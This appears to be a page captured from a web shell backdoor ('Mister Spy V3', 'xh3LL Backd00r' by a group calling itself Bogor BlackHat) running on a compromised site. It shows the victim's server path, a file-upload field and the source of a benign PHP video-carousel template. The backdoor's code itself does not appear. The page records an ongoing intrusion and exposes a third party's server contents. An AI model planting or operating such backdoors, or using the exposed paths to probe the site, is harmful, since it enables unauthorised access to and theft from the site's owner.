Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/
Upload File :
Current File : /home/caballoscriollos/www/web/ssi_videos_home.php

<?php
if ($arrVideosHome) {
?>
<section class="news-carousel-page no-bg pb-long">
    <div class="container">
        <div class="section-title-three text-center">
            <div class="section-title-three__tagline-box">
                <p class="section-title-three__tagline">Galer&iacute;a de </p>
            </div>
            <h2 class="section-title-three__title" style="text-transform: none;">Videos y Podcast</h2>
        </div>
        <div class="news-carousel news-owl__carousel owl-theme owl-carousel carousel-dot-style" data-owl-options='{
            "items": 3,
            "margin": 30,
            "smartSpeed": 700,
            "loop":true,
            "autoplay": false,
            "nav":false,
            "dots":true,
            "navText": ["<span class=\"fa fa-angle-left\"></span>","<span class=\"fa fa-angle-right\"></span>"],
            "responsive":{
                "0":{
                    "items":1
                },
                "768":{
                    "items":2
                },
                "992":{
                    "items": 3
                }
            }
        }'>
            <?php
            foreach ($arrVideosHome as $oVideo) {
            ?>
            <div class="item">
                <div class="news-three__single">
                    <div class="news-three__img-box">
                        <div class="news-three__img video-container">
                            <img src="https://img.youtube.com/vi/<?= GetIdVideoYouTube($oVideo->Url) ?>/sddefault.jpg" alt="">
                            <div class="video-img-icon">
                                <a href="https://www.youtube.com/watch?v=<?= GetIdVideoYouTube($oVideo->Url) ?>" class="video-popup">
                                    <div class="main-slider-four__video-icon">
                                        <i class="fa fa-play"></i>
                                        <i class="ripple"></i>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                    <div class="news-three__content">
                        <h3 class="news-three__title mt-2">
                            <a href="https://www.youtube.com/watch?v=<?= GetIdVideoYouTube($oVideo->Url) ?>" class="video-popup"><?= $oVideo->Nombre ?></a>
                        </h3>
                    </div>
                </div>
            </div>
            <?php
            }
            ?>
        </div>
    </div>
</section>
<?php
}
?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat